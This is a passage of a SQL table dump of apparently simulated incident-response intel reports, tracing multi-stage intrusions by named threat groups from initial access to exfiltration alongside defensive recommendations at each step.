(122, 22, 409, 2, 'Backdoor Malware Deployment Detected', '### Overview\nFollowing the supply chain compromise, APT41 has deployed backdoor malware to maintain clandestine access to the systems. This malware is likely custom-built and designed to evade detection.\n\n### Malware Characteristics\n- **Type**: Custom backdoor with advanced evasion features.\n- **Command and Control**: Utilizes encrypted communications to a remote server.\n\n### Next Steps\nThe focus will likely shift to **Establishing Persistence**. Anticipate techniques such as rootkit deployment to ensure long-term access and stealth.', '2026-01-04 02:21:52'),
(123, 22, 410, 3, 'Persistence Mechanism through Rootkit Deployment', '### Overview\nAPT41 has successfully established persistence by installing a rootkit. This rootkit operates at a low level, providing the attackers with the ability to maintain access and conceal their activities effectively.\n\n### Rootkit Details\n- **Capabilities**: Hides files, processes, and network connections.\n- **Installation**: Likely implanted through escalated privileges gained via malware.\n\n### Next Steps\nPrepare for **Lateral Movement** as the attackers might attempt to access sensitive databases, including those containing Personally Identifiable Information (PII).', '2026-01-04 02:21:52'),
(124, 22, 411, 4, 'Lateral Movement Towards PII Databases', '### Overview\nAPT41 has progressed to lateral movement, targeting databases containing PII. This phase involves exploiting compromised credentials and leveraging them to navigate through the network.\n\n### Techniques Observed\n- **Credential Dumping**: Use of tools to extract credentials from memory.\n- **Network Scanning**: Mapping out network architecture to identify PII storage.\n\n### Next Steps\nExpect imminent **Data Exfiltration** of gaming source code and PII. Implement network monitoring and data leakage prevention measures immediately.', '2026-01-04 02:21:52'),
(125, 22, 412, 5, NULL, NULL, '2026-01-04 02:21:52'),
(126, 23, 413, 1, 'In-Depth Analysis: Supply Chain Compromise', '### Overview\nThe recent detection of a **Supply Chain Compromise** indicates a sophisticated attempt to infiltrate our network through third-party software or services. This method is commonly employed by APT41 to bypass traditional security measures by embedding malicious code within trusted updates or applications.\n\n### Indicators of Compromise (IoCs)\n- Newly introduced DLL files in application directories.\n- Unusual outbound traffic patterns from software update services.\n\n### Recommended Actions\n- Conduct a comprehensive review of all third-party software sources.\n- Isolate compromised systems and initiate a forensic investigation.\n- Enhance monitoring on network traffic associated with supply chain services.\n\n### Next Steps\nPrepare for potential **Suspicious Script Execution**, as attackers might leverage compromised software to execute malicious scripts.', '2026-01-04 04:11:48'),
(127, 23, 414, 2, 'Investigation: Suspicious Script Execution Patterns', '### Overview\nFollowing the supply chain compromise, a **Suspicious Script Execution** has been detected. APT41 often utilizes scripts to automate the deployment of their payloads and establish a foothold in the network.\n\n### Key Findings\n- Scripts attempting to execute PowerShell commands with obfuscation techniques.\n- Log entries indicating unauthorized script activity during off-peak hours.\n\n### Recommendations\n- Implement script-blocking policies at the endpoint level.\n- Increase audit logging of PowerShell and other script execution frameworks.\n- Conduct user awareness training on recognizing phishing attempts that may lead to script execution.\n\n### Next Steps\nRemain vigilant for **Persistence Mechanism Activation**, as attackers may seek to maintain access to the compromised systems.', '2026-01-04 04:11:48'),
(128, 23, 415, 3, 'Insight: Persistence Mechanism Activation', '### Overview\nThe detection of a **Persistence Mechanism Activation** suggests that attackers are attempting to maintain long-term access to the compromised environment. APT41 may use various methods such as registry modifications or scheduled tasks.\n\n### Key Indicators\n- Creation of new registry keys pointing to unknown executables.\n- Scheduled tasks set to execute at irregular intervals.\n\n### Mitigation Strategies\n- Audit and clean registry entries associated with unauthorized applications.\n- Review and disable suspicious scheduled tasks.\n- Deploy Endpoint Detection and Response (EDR) tools to monitor persistence techniques.\n\n### Next Steps\nPrepare to intercept **Lateral Movement**, as attackers may attempt to expand their access across the network.', '2026-01-04 04:11:48'),
(129, 23, 416, 4, 'Analysis: Lateral Movement Detected', '### Overview\n**Lateral Movement** has been detected, indicating that the attackers are attempting to spread their foothold within the network. APT41 often uses stolen credentials and exploits to navigate through systems.\n\n### Evidence Collected\n- Unauthorized access attempts on multiple networked devices.\n- Usage of compromised credentials to access sensitive systems.\n\n### Defensive Measures\n- Implement network segmentation to limit lateral movement capabilities.\n- Conduct a full credential reset, prioritizing high-privilege accounts.\n- Utilize honeypots to detect unauthorized movement attempts.\n\n### Next Steps\nFocus on preventing **Data Exfiltration Attempts**, as attackers may attempt to extract valuable data before detection.', '2026-01-04 04:11:48'),
(130, 23, 417, 5, NULL, NULL, '2026-01-04 04:11:48'),
(131, 24, 418, 1, 'Insight into Initial Access through Phishing', '### Overview\nThe phishing email detected in the initial alert utilized a well-crafted spear-phishing technique targeting employees with access to critical systems.\n\n### Details\n- **Sender:** masqueraded as a trusted vendor.\n- **Subject Line:** \"Urgent Invoice Request\"\n- **Payload:** Attachment containing a malicious macro.\n\n### Recommendations\n- Conduct an organization-wide phishing awareness training.\n- Implement an email filtering system to detect and quarantine suspicious emails.\n\n### Next Steps\nMonitor for any execution of malware associated with this phishing attempt.', '2026-01-04 04:13:57'),
(132, 24, 419, 2, 'Analysis of Malware Execution', '### Overview\nFollowing the phishing incident, malware execution was detected on the targeted employee\'s workstation.\n\n### Details\n- **Type of Malware:** Cobalt Strike\n- **Execution Method:** Macro within Excel document\n- **Impact:** Established a command and control (C2) channel.\n\n### Recommendations\n- Isolate the affected workstation immediately.\n- Deploy endpoint detection and response (EDR) solutions to prevent further spread.\n\n### Next Steps\nInvestigate persistence mechanisms that may have been employed by the malware.', '2026-01-04 04:13:57'),
(133, 24, 420, 3, 'Detection of Persistence Mechanisms', '### Overview\nThe malware has established persistence to survive system reboots and maintain access.\n\n### Details\n- **Persistence Technique:** Registry run keys\n- **Additional Observations:** Scheduled tasks were also modified.\n\n### Recommendations\n- Review and clean registry entries.\n- Analyze scheduled tasks for unauthorized modifications.\n\n### Next Steps\nMonitor for unusual administrative access that may indicate lateral movement within the network.', '2026-01-04 04:13:57'),
(134, 24, 421, 4, 'Unauthorized Admin Access Detected', '### Overview\nAnomalous administrative access was detected, indicating potential lateral movement by the threat actor.\n\n### Details\n- **Account Compromised:** Admin account \"sysadmin\"\n- **Access Point:** Remote desktop protocol (RDP)\n- **Time of Access:** 03:45 AM\n\n### Recommendations\n- Immediately reset credentials for all admin accounts.\n- Implement multi-factor authentication (MFA) for critical accounts.\n\n### Next Steps\nInvestigate and monitor for any signs of data exfiltration attempts.', '2026-01-04 04:13:57'),
(135, 24, 422, 5, NULL, NULL, '2026-01-04 04:13:57'),
(136, 25, 423, 1, 'Phishing Email Analysis', '### Initial Findings\n\nThe phishing email detected contained a malicious attachment disguised as an invoice. The email was sent from a seemingly legitimate domain but upon further inspection, the domain was registered only days prior to the attack. The email header analysis revealed multiple red flags including mismatched sender information and a peculiar routing path through compromised servers.\n\n### Next Steps\n\n1. **Immediate Action:** Isolate the user account that received and interacted with the email.\n2. **Investigation:** Conduct a deeper analysis of the attachment to determine the specific exploit used.\n3. **Preparation:** Anticipate potential execution attempts via scripts and monitor PowerShell activity closely.', '2026-01-04 04:25:30'),
(137, 25, 424, 2, 'PowerShell Script Execution Insights', '### Script Analysis\n\nThe suspicious PowerShell script executed on the compromised endpoint was obfuscated to evade detection. The script attempted to download additional payloads from a remote server using encoded commands. This behavior is consistent with the initial stages of malware deployment.\n\n### Mitigation Steps\n\n1. **Isolation:** Disconnect the affected machine from the network immediately.\n2. **Forensic Analysis:** Capture a memory dump for further investigation.\n3. **Monitoring:** Enhance monitoring on PowerShell logs and network traffic to detect other possible execution attempts.\n\n### Preparing for Persistence\n\nBe vigilant for signs of persistence mechanisms, such as unusual changes in registry keys or scheduled tasks.', '2026-01-04 04:25:33'),
(138, 25, 425, 3, 'Persistence Mechanism Investigation', '### Observations\n\nPersistence was established through registry modifications and the creation of hidden scheduled tasks. Additionally, the malware created a startup entry to ensure execution upon system reboot.\n\n### Countermeasures\n\n1. **Registry Audit:** Conduct a full audit of recent registry changes, focusing on keys related to startup programs.\n2. **Scheduled Task Review:** Identify and remove unauthorized tasks.\n3. **User Education:** Reinforce training on recognizing and reporting phishing attempts.\n\n### Preparing for Lateral Movement\n\nMonitor RDP connections and unusual authentication attempts across the network.', '2026-01-04 04:25:33'),
(139, 25, 426, 4, 'Lateral Movement and Exfiltration Threat Analysis', '### Lateral Movement Detection\n\nThe adversary utilized Remote Desktop Protocol (RDP) to move laterally within the network. This was facilitated by previously compromised credentials.\n\n### Immediate Actions\n\n1. **Credential Review:** Reset passwords for all affected accounts and enforce MFA.\n2. **RDP Restrictions:** Limit RDP access to only essential personnel and monitor for unauthorized attempts.\n\n### Preparing for Data Exfiltration\n\nAs exfiltration is likely the next stage, enhance monitoring of outbound network traffic and inspect large data transfers for legitimacy. Employ DLP solutions to prevent unauthorized data transfers.', '2026-01-04 04:25:33'),
(140, 25, 427, 5, NULL, NULL, '2026-01-04 04:25:33'),
(141, 26, 428, 1, 'Analysis of Initial Access Vector', '### Overview\nAfter detecting the spear phishing email, our analysis has identified key elements within the email structure that are consistent with Cl0p\'s tactics. The email contained a seemingly legitimate attachment designed to deceive the recipient into executing it.\n\n### Email Characteristics\n- **Sender Address:** Spoofed domain closely resembling a known partner.\n- **Subject Line:** Urgent action required to avoid account suspension.\n- **Attachment:** A compressed file containing a malicious script.\n\n### Next Steps\nThe focus will now shift to monitoring potential execution vectors, particularly any script execution resulting from this phishing attempt.', '2026-01-04 04:38:04'),
(142, 26, 429, 2, 'Malicious Script Execution Confirmed', '### Overview\nA malicious script linked to the previously detected spear phishing email was executed on the target system. This script has been identified as a custom PowerShell script, a common tool in Cl0p\'s arsenal.\n\n### Script Analysis\n- **Payload:** The script downloads and executes additional payloads.\n- **Obfuscation Techniques:** Heavy use of string obfuscation to evade detection.\n- **Target System Impact:** Initial dropper for further malware deployment.\n\n### Next Steps\nOur priority is to determine how the attacker is establishing persistence. Monitoring registry changes and other system modifications will be critical.', '2026-01-04 04:38:04'),
(143, 26, 430, 3, 'Persistence Mechanism Detected', '### Overview\nPersistence has been established via registry modification, a tactic often utilized by Cl0p to maintain access to compromised systems.\n\n### Details of Modification\n- **Registry Key Altered:** HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n- **Malware Executable:** Set to launch a secondary payload on system startup.\n\n### Implications\nThis persistence method suggests a long-term intent to maintain control over the system.\n\n### Next Steps\nFocus will now be on detecting lateral movement attempts, particularly through credential dumping activities that may follow.', '2026-01-04 04:38:04'),
(144, 26, 431, 4, 'Credential Dumping Detected', '### Overview\nCredential dumping activity has been identified, indicating an attempt to escalate privileges and move laterally within the network.\n\n### Tools and Techniques\n- **Tool Utilized:** Mimikatz, a known tool for credential extraction.\n- **Target:** Local Security Authority Subsystem Service (LSASS) process.\n\n### Security Implications\nCompromised credentials could allow access to critical systems and sensitive data.\n\n### Next Steps\nImmediate attention is required to monitor for data exfiltration attempts, especially through encrypted channels, a known Cl0p tactic.', '2026-01-04 04:38:04'),
(145, 26, 432, 5, NULL, NULL, '2026-01-04 04:38:04'),
(146, 27, 433, 1, 'Analysis of Suspicious Login Attempts', '## Context:\nFollowing the detection of suspicious login attempts indicating potential password spraying, further analysis is required to determine the risk level and potential targets.\n\n### Summary:\n- **Targets Identified:** Diplomatic personnel accounts.\n- **IP Patterns:** Multiple IP addresses originating from known threat landscapes.\n- **Recommendations:**\n  - Implement multi-factor authentication (MFA).\n  - Increase monitoring on login attempts from suspicious IPs.\n  - Educate users on recognizing phishing attempts.\n\n### Next Steps:\nMonitoring should continue to detect any unusual token usage, potentially indicating token theft.', '2026-01-04 23:55:22'),
(147, 27, 434, 2, 'Unusual Token Usage Analysis', '## Context:\nFollowing the detection of unusual token usage patterns, this report delves deeper into potential token theft activities.\n\n### Summary:\n- **Token Characteristics:**\n  - Tokens used outside of normal geographic locations.\n  - Access requests for sensitive diplomatic documents.\n- **Attack Vector:** Possible exploitation of application vulnerabilities.\n- **Mitigation Measures:**\n  - Revoke compromised tokens.\n  - Reset affected accounts.\n  - Strengthen token issuance policies.\n\n### Next Steps:\nVigilance is required for any unauthorized OAuth applications that may be created, leveraging stolen tokens.', '2026-01-04 23:55:22'),
(148, 27, 435, 3, 'Unauthorized OAuth Application Creation Alert', '## Context:\nDetection of unauthorized OAuth applications suggests potential abuse aimed at gaining persistent access to sensitive resources.\n\n### Summary:\n- **Applications Identified:** Several OAuth applications mimicking legitimate services.\n- **Impacted Resources:** Access to email, cloud storage, and internal communication tools.\n- **Countermeasures:**\n  - Immediate removal of unauthorized applications.\n  - Conduct a thorough review of existing OAuth permissions.\n  - Tighten OAuth application approval processes.\n\n### Next Steps:\nMonitor for signs of lateral movement within the cloud environment to preempt further exploitation.', '2026-01-04 23:55:22'),
(149, 27, 436, 4, 'Lateral Movement and Cloud Exploitation Insights', '## Context:\nDetection of lateral movement within the cloud environment indicates potential exploitation following OAuth abuse.\n\n### Summary:\n- **Patterns Observed:**\n  - Access to multiple cloud services using compromised identities.\n  - Unusual escalation of privileges within cloud platforms.\n- **Threat Actors:** Likely linked to known APT groups targeting diplomatic entities.\n- **Defensive Actions:**\n  - Audit and restrict permissions on sensitive resources.\n  - Employ behavior analytics to detect anomalies.\n\n### Next Steps:\nRemain vigilant for any signs of data exfiltration, which may be the next phase of the attack.', '2026-01-04 23:55:22'),
(150, 27, 437, 5, NULL, NULL, '2026-01-04 23:55:22'),
(151, 28, 438, 1, 'Analysis of PowerShell Execution Patterns', '### Context\nFollowing the detection of unusual PowerShell execution, a detailed analysis was conducted to understand the patterns and motives behind this activity.\n\n### Findings\n- **Command Execution**: The PowerShell script was executed with obfuscated commands, suggesting an attempt to evade detection.\n- **Objective**: Initial analysis indicates the possibility of reconnaissance activities, potentially setting up for persistence mechanisms.\n\n### Recommendations\n- **Monitoring**: Enhance logging of PowerShell activities and implement real-time alerts for suspicious command patterns.\n- **Mitigation**: Implement PowerShell script block logging and transcription to capture detailed execution data.\n\n### Next Steps\nPrepare for potential persistence mechanisms, as suggested by the nature of the PowerShell activity. Stay vigilant for suspicious WMI activity.', '2026-01-04 23:57:10'),
(152, 28, 439, 2, 'Investigation into Suspicious WMI Activity', '### Context\nPost detection of suspicious WMI activity, an investigation was launched to determine the scope and impact of this persistence strategy.\n\n### Findings\n- **WMI Usage**: The attacker leveraged WMI to establish persistence, likely by creating event subscriptions to execute malicious scripts upon specific triggers.\n- **Scope**: This activity is consistent with tactics used by Volt Typhoon, indicating a sophisticated threat actor.\n\n### Recommendations\n- **Hardening**: Disable unnecessary WMI services and restrict access to only authorized personnel.\n- **Detection**: Employ advanced monitoring to detect new WMI event subscriptions or alterations to existing ones.\n\n### Next Steps\nPrepare for potential lateral movement, as WMI activity often precedes such actions. Monitor for changes in network configurations or unusual remote access attempts.', '2026-01-04 23:57:10'),
(153, 28, 440, 3, 'Security Implications of Anomalous netsh Configuration', '### Context\nAnomalous changes in netsh configuration were observed, indicating potential lateral movement efforts by the threat actor.\n\n### Findings\n- **Configuration Changes**: The attacker appears to have modified firewall rules and network configurations to facilitate lateral movement within the infrastructure.\n- **Intent**: Such changes are typically employed to bypass network security controls or to establish covert communication channels.\n\n### Recommendations\n- **Review**: Conduct a comprehensive review of all recent netsh configuration changes and validate against security policies.\n- **Prevention**: Implement strict access controls and regular audits on network configuration tools.\n\n### Next Steps\nMonitor for unusual remote desktop protocol (RDP) sessions, which may be utilized for further lateral movement across the network.', '2026-01-04 23:57:10'),
(154, 28, 441, 4, 'Detection of Unusual RDP Sessions', '### Context\nThe detection of unexpected RDP sessions suggests an ongoing lateral movement effort by the attacker within the network.\n\n### Findings\n- **RDP Activity**: Multiple unauthorized RDP sessions were initiated, likely to access sensitive systems and further compromise the infrastructure.\n- **Patterns**: The sessions were conducted using compromised credentials, indicating the threat actor\'s success in credential theft.\n\n### Recommendations\n- **Access Controls**: Enhance RDP access controls and enforce multi-factor authentication for remote access.\n- **Surveillance**: Implement continuous monitoring of RDP sessions and alert on any deviations from normal patterns.\n\n### Next Steps\nRemain alert for potential exfiltration attempts, as attackers may leverage newly gained access to exfiltrate data through encrypted channels.', '2026-01-04 23:57:10'),
(155, 28, 442, 5, NULL, NULL, '2026-01-04 23:57:10'),
(156, 29, 443, 1, 'Analysis of Phishing Email Tactics', '## Overview\nThe phishing email detected appears to be part of a coordinated campaign by Charming Kitten, targeting journalists. The email contains a malicious link disguised as a legitimate news article.\n\n## Detailed Analysis\n- **Sender Details**: The email masquerades as coming from a known media organization, using a spoofed domain closely resembling the legitimate one.\n- **Content**: The email body uses urgent language to entice the recipient to click on the link, promising exclusive content.\n\n## Recommendations\n- **User Awareness**: Encourage recipients to verify the sender\'s email address.\n- **Security Measures**: Implement email filtering and flagging for known malicious domains.\n\n## Next Steps\nPrepare for potential follow-up attacks through other communication channels such as WhatsApp.', '2026-01-04 23:59:37'),
(157, 29, 444, 2, 'Malicious WhatsApp Message Dissection', '## Overview\nFollowing the phishing email, a malicious WhatsApp message was detected, indicating a multi-channel social engineering approach by Charming Kitten.\n\n## Detailed Analysis\n- **Message Content**: The message contains a shortened URL leading to a website hosting the DownPaper backdoor.\n- **Social Engineering Aspect**: The message pretends to be a continuation of the email conversation, increasing credibility.\n\n## Recommendations\n- **User Training**: Advise targets to verify unexpected messages, particularly those with links.\n- **Technical Measures**: Enhance monitoring on communication apps for known malicious URLs.\n\n## Next Steps\nAnticipate potential malware execution if the DownPaper payload is delivered successfully.', '2026-01-04 23:59:37'),
(158, 29, 445, 3, 'DownPaper Backdoor Execution Analysis', '## Overview\nThe DownPaper backdoor has been executed on a system, confirming the delivery method was successful through the malicious WhatsApp message.\n\n## Detailed Analysis\n- **Payload Functionality**: The backdoor establishes a connection to a command and control server, allowing remote access.\n- **Indicators of Compromise**: Look for unusual network traffic and processes related to DownPaper.\n\n## Recommendations\n- **Immediate Action**: Isolate the affected system to prevent further compromise.\n- **Detection Enhancement**: Update endpoint protection to identify DownPaper signatures.\n\n## Next Steps\nMonitor for lateral movement attempts within the network.', '2026-01-04 23:59:37'),
(159, 29, 446, 4, 'Lateral Movement and Data Exfiltration Readiness', '## Overview\nAfter executing the DownPaper backdoor, attempts to move laterally across the network have been detected.\n\n## Detailed Analysis\n- **Movement Techniques**: The attackers are exploiting known vulnerabilities in network protocols to move between systems.\n- **Target Identification**: Critical systems and databases appear to be the focus of these movements.\n\n## Recommendations\n- **Network Segmentation**: Implement stricter segmentation to limit lateral movement.\n- **Patch Management**: Ensure all systems are up-to-date with the latest security patches.\n\n## Next Steps\nPrepare for possible data exfiltration attempts by monitoring outgoing traffic for anomalies.', '2026-01-04 23:59:37'),
(160, 29, 447, 5, NULL, NULL, '2026-01-04 23:59:37'),
(161, 30, 448, 1, 'Initial Access Analysis: VPN Anomaly', '### VPN Login Anomaly\n\nAfter the detection of a suspicious VPN login from an unusual location, further investigation revealed that the credentials used were valid, suggesting potential credential compromise. The login originated from an IP address associated with known malicious activity. Analysts are advised to monitor for any further signs of unauthorized access.\n\n#### Recommendations\n- Immediately reset compromised credentials.\n- Implement geo-restriction policies on VPN access.\n- Increase logging and monitoring on VPN devices.', '2026-01-05 00:02:38');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(162, 30, 449, 2, 'Execution Tactics: Web Shell Deployment', '### Web Shell Detected on VPN Device\n\nA web shell has been detected on the compromised VPN device, indicating execution of potentially malicious code. The web shell allows remote execution of commands and could be used to further infiltrate the network.\n\n#### Recommendations\n- Isolate impacted VPN devices immediately.\n- Conduct a thorough inspection for additional web shells.\n- Patch any vulnerabilities in the VPN firmware.', '2026-01-05 00:02:38'),
(163, 30, 450, 3, 'Lateral Movement Insights: Network Traffic Anomalies', '### Unusual Network Traffic Patterns\n\nPost web shell deployment, there has been unusual network traffic from the VPN device to multiple internal servers. This traffic suggests lateral movement attempts within the network, potentially targeting critical systems or domain controllers.\n\n#### Recommendations\n- Capture and analyze network traffic logs.\n- Deploy network segmentation to limit lateral movement.\n- Increase IDS/IPS sensitivity to detect anomalous traffic.', '2026-01-05 00:02:38'),
(164, 30, 451, 4, 'Persistence Analysis: Domain Controller Access Attempt', '### Unauthorized Domain Controller Access\n\nAn unauthorized access attempt was detected on the domain controller, suggesting efforts to establish persistence. The attacker likely seeks to maintain long-term access to the network.\n\n#### Recommendations\n- Audit domain controller access logs for anomalies.\n- Implement two-factor authentication for sensitive systems.\n- Regularly review and harden domain controller configurations.', '2026-01-05 00:02:38'),
(165, 30, 452, 5, 'Credential Harvesting: Mimikatz Activity', '### Mimikatz Detected on Domain Controller\n\nMimikatz, a tool used for credential harvesting, was detected running on the domain controller. This indicates that the attacker is attempting to extract credentials to escalate privileges and expand access.\n\n#### Recommendations\n- Revoke and reset compromised credentials immediately.\n- Implement endpoint detection and response solutions.\n- Conduct a full security audit of domain controller systems.', '2026-01-05 00:02:38'),
(166, 30, 453, 6, 'Exfiltration Alert: Data Movement from Domain Controller', '### Data Exfiltration Detected\n\nSignificant data exfiltration activity has been detected from the domain controller. This suggests that sensitive information has been compromised and potentially transferred outside the network.\n\n#### Recommendations\n- Identify and secure the data exfiltration point.\n- Implement data loss prevention tools.\n- Notify relevant stakeholders and legal entities as per compliance requirements.', '2026-01-05 00:02:38'),
(167, 30, 454, 7, NULL, NULL, '2026-01-05 00:02:38'),
(168, 32, 455, 1, 'Post-Compromise Analysis: Third-Party Library Breach', '### Overview\nThe initial alert identified a compromise via a third-party library, suggesting a supply chain attack. This indicates a breach at the level of software dependencies, commonly exploited by Magecart groups.\n\n### Technical Details\n- **Vulnerable Library**: The breach originated from a popular JavaScript library commonly used for e-commerce platforms.\n- **Attack Vector**: The attackers injected malicious code into the library before distribution, affecting all sites utilizing the compromised version.\n\n### Recommendations\n- **Immediate Actions**: Remove the compromised library version from your systems and monitor for any unusual activity.\n- **Long-term Strategy**: Implement a robust dependency tracking system and regularly audit third-party code for vulnerabilities.\n\n### Next Steps\nPrepare for potential **Code Injection** activities, as malicious scripts are likely to be executed on compromised websites.', '2026-01-05 00:07:01'),
(169, 32, 456, 2, 'Execution of Obfuscated JavaScript: Code Injection Analysis', '### Overview\nFollowing the supply chain compromise, obfuscated JavaScript has been detected executing within the affected websites. This is a classic Magecart tactic aimed at capturing sensitive user data.\n\n### Technical Details\n- **Obfuscation Method**: The JavaScript code uses advanced obfuscation techniques to avoid detection by standard security tools.\n- **Functionality**: The script is designed to skim credit card information entered on checkout pages and store it temporarily before exfiltration.\n\n### Recommendations\n- **Immediate Actions**: Deploy advanced threat detection tools capable of de-obfuscating and analyzing JavaScript code in real-time.\n- **Mitigation Strategy**: Harden your Content Security Policy (CSP) to restrict unauthorized script execution.\n\n### Next Steps\nPrepare for **Data Exfiltration** as the attackers will attempt to transfer skimmed data to their drop servers. Monitor outgoing network traffic for anomalies.', '2026-01-05 00:07:01'),
(170, 32, 457, 3, NULL, NULL, '2026-01-05 00:07:01'),
(171, 33, 458, 1, 'Initial Access Analysis: Vendor Login Anomaly', '## Investigation Summary\nThe suspicious vendor login detected indicates potential unauthorized access to the retail network. The login was traced back to an IP address known for previous cyber activities linked to the FIN6 group.\n\n## Incident Details\n- **Date & Time**: [Timestamp]\n- **Source IP**: [Suspicious IP Address]\n- **Affected System**: Vendor portal\n\n## Recommendations\n- Immediately review access logs for the vendor portal.\n- Implement multi-factor authentication for vendor accounts.\n- Conduct a security audit of all vendor credentials.\n\n## Next Steps\nPrepare for potential escalation of activities, such as malware deployment, given historical patterns of FIN6 operations.', '2026-01-05 00:10:13'),
(172, 33, 459, 2, 'Trinity Malware Deployment on POS Systems', '## Incident Overview\nFollowing the initial access, Trinity malware has been deployed across multiple POS systems. This malware is engineered to scrape sensitive credit card data.\n\n## Key Indicators\n- **Malware Signature**: Trinity (v2.5)\n- **Affected Systems**: POS terminals at multiple retail locations\n- **Detection Method**: Anomalous network traffic and unusual process activity\n\n## Containment Measures\n- Isolate affected POS systems from the network.\n- Begin forensic imaging of compromised systems for deeper analysis.\n\n## Next Steps\nFocus on understanding the method of persistence that the attackers may employ to maintain access within the network.', '2026-01-05 00:10:13'),
(173, 33, 460, 3, 'Persistence Mechanisms: Ensuring Long-term Access', '## Persistence Tactics\nFollowing the Trinity malware deployment, evidence suggests the attackers are establishing persistence mechanisms to secure long-term access.\n\n## Observations\n- **Backdoor Installations**: Detected across several POS systems.\n- **Registry Alterations**: Unusual changes consistent with persistence techniques.\n- **Scheduled Tasks**: Newly created tasks that execute malicious scripts.\n\n## Recommendations\n- Perform a comprehensive review of system startup entries and scheduled tasks.\n- Remove unauthorized backdoors and restore registry settings to default.\n\n## Next Steps\nMonitor for lateral movement attempts as attackers may seek to expand their foothold within the network.', '2026-01-05 00:10:13'),
(174, 33, 461, 4, 'Lateral Movement Detected: Expanding Attack Surface', '## Movement Patterns\nUnauthorized lateral movement has been detected, suggesting an expansion of the attack surface by FIN6 operatives.\n\n## Indicators of Compromise\n- **Credential Harvesting**: Attempts to access additional systems using compromised credentials.\n- **Network Scanning**: Scans targeting lateral movement pathways.\n- **Unauthorized Access**: Attempts to access HR and financial systems.\n\n## Containment Strategies\n- Implement network segmentation to restrict unauthorized access.\n- Reset credentials for all potentially compromised accounts.\n\n## Next Steps\nPrepare for potential data exfiltration attempts, focusing particularly on sensitive financial data.', '2026-01-05 00:10:13'),
(175, 33, 462, 5, NULL, NULL, '2026-01-05 00:10:13'),
(176, 34, 463, 1, 'Execution of Embedded VBScript Backdoor Uncovered', '### Overview\nFollowing the initial access achieved through a weaponized Word document, further investigation has revealed the execution of an embedded VBScript backdoor. This backdoor is activated as soon as the document is opened by the target, exploiting vulnerabilities in VBScript execution.\n\n### Technical Details\nThe VBScript is designed to run in the background, establishing persistent access to the compromised system. It leverages Windows Management Instrumentation (WMI) to execute commands and maintain a foothold.\n\n### Indicators of Compromise (IOCs)\n- Unusual network traffic originating from the affected host.\n- Creation of scheduled tasks or registry entries linked to VBScript execution.\n\n### Recommendations\n- Implement strict email filtering to block potentially malicious attachments.\n- Educate personnel on recognizing phishing attempts and suspicious document behaviors.', '2026-01-05 02:59:34'),
(177, 34, 464, 2, 'Data Exfiltration via Encrypted Channels Identified', '### Overview\nThe previously identified VBScript backdoor has facilitated data exfiltration activities. Our analysis indicates that sensitive information is being transmitted through encrypted channels, making detection more challenging.\n\n### Technical Details\nThe data exfiltration process involves packaging sensitive files into encrypted archives, which are then transmitted to remote servers controlled by the threat actors. The use of HTTPS and other encrypted protocols obscures the content from standard monitoring tools.\n\n### Indicators of Compromise (IOCs)\n- Outbound connections to unfamiliar IP addresses using HTTPS.\n- Unusual data transfer volumes at odd hours.\n\n### Recommendations\n- Deploy network anomaly detection systems to identify unusual patterns in encrypted traffic.\n- Conduct regular audits of data access and transfer logs to spot unauthorized activities.\n- Strengthen endpoint security measures to detect and block unauthorized encryption tools.', '2026-01-05 02:59:34'),
(178, 34, 465, 3, NULL, NULL, '2026-01-05 02:59:34'),
(179, 35, 466, 1, 'Insight into Initial Access: Trojanized Software Update', '### Contextual Analysis\n\nFollowing the detection of the **trojanized software update**, our investigation reveals that the compromise occurred through a sophisticated supply chain attack. The malicious update originates from a compromised vendor responsible for developing ICS software used widely in the energy sector.\n\n### Key Observations:\n- **Vendor Breach**: Initial analysis suggests that the vendor\'s software distribution infrastructure was breached approximately 3 months ago.\n- **Malware Characteristics**: The trojanized update includes a payload designed to install a Remote Access Trojan (RAT) known as \'Havex\'.\n\n### Next Steps:\n- **Monitor for RAT Deployment**: Be vigilant for signs of \'Havex\' RAT installation and execution across affected systems.\n- **Vendor Communication**: Engage with the software vendor to confirm breach details and remediation plans.', '2026-01-05 03:02:42'),
(180, 35, 467, 2, 'Execution of \'Havex\' RAT: Command and Control Infrastructure', '### Incident Overview\n\nPost-deployment of the **\'Havex\' RAT**, communication with its command and control (C2) servers has been observed. This RAT allows adversaries remote control over infected machines, enabling further reconnaissance and exploitation.\n\n### Key Indicators:\n- **C2 Domains**: Infected systems connect to multiple C2 domains, some of which have been newly registered and others linked to known threat actor infrastructure.\n- **RAT Capabilities**: The \'Havex\' RAT is capable of gathering system information, executing commands, and facilitating lateral movement.\n\n### Actionable Intelligence:\n- **Registry Monitoring**: Prepare to detect persistence mechanisms, particularly involving registry modifications.\n- **Network Segmentation**: Implement stricter network segmentation to limit RAT communication and lateral movement.', '2026-01-05 03:02:42'),
(181, 35, 468, 3, 'Persistence Mechanism: Registry Modifications Detected', '### Persistence Analysis\n\nThe adversary has employed **registry modifications** to ensure the \'Havex\' RAT remains active. This persistence mechanism involves altering system configurations to execute the RAT upon system startup.\n\n### Technical Details:\n- **Registry Keys Altered**: Modifications have been observed in key areas responsible for startup execution, specifically within `HKEY_LOCAL_MACHINE` and `HKEY_CURRENT_USER` paths.\n- **Stealth Tactics**: The changes are subtle, designed to evade typical detection methods by mimicking legitimate entries.\n\n### Recommendations:\n- **Conduct Integrity Checks**: Regularly verify registry integrity against known good baselines.\n- **Prepare for Lateral Movement**: Anticipate network reconnaissance activities, specifically anomalies in SMB traffic.', '2026-01-05 03:02:42'),
(182, 35, 469, 4, 'Lateral Movement: SMB Traffic Anomaly and Network Reconnaissance', '### Network Activity Review\n\nUnusual **SMB traffic patterns** indicate ongoing **lateral movement** and reconnaissance activities. This phase involves mapping the network to identify high-value targets for data exfiltration.\n\n### Traffic Analysis:\n- **Suspicious Connections**: Multiple SMB connections initiated from compromised hosts targeting administrative shares.\n- **Reconnaissance Tools**: Use of known tools such as `PsExec` and `WMIC` to explore network topology and access additional systems.\n\n### Defensive Measures:\n- **Anomaly Detection**: Enhance monitoring for unusual SMB traffic and lateral movement activities.\n- **Data Exfiltration Monitoring**: Prepare to intercept unauthorized data transfers, particularly those involving sensitive operational data.', '2026-01-05 03:02:42'),
(183, 35, 470, 5, NULL, NULL, '2026-01-05 03:02:42'),
